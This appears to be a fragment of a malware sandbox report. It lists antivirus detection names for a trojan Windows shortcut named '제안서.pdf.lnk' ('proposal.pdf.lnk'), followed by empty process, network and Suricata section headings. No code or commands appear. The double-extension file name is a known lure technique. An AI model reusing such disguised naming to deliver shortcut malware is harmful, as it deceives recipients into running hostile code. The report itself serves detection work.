GData	Heur.BZC.YAX.Pantera.229.198946D1
VBA32	Trojan.Link.Crafted
huorong	Trojan/LNK.Agent.be
Fortinet	LNK/Agent.AHE!tr
AVG	LNK:Agent-HN [Trj]

제안서.pdf.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All